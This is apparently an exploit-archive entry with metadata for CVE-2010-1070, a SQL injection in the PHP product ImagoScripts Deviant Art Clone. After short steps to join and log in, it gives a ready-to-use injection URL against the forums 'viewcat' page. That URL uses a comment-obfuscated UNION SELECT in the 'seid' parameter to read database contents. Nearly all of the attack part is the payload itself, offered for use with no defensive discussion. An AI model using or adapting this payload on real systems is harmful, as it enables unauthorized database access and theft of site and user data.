ImagoScripts Deviant Art Clone - SQL Injection
Author: alnjm33
type: webapps
platform: php
port:
date_added: 2010-01-03
date_updated:
verified: 1
codes: OSVDB-61482;CVE-2010-1070
tags:
aliases:
screenshot_url:
application_url:
Exploit Title:ImagoScripts Deviant Art Clone SQL Injection Vulnerability
Date: 4/1/2010
Author: alnjm33
Software Link: http://imagoscripts.com/index.php?act=viewProd&productId=2 it cost 50$ :)
________________________
first join in site
site/path/index.php?mode=join
then log in
and this is exploit
site/path//index.php?mode=forums&act=viewcat&seid=-1/**/union/**/select 1,version(),3,4--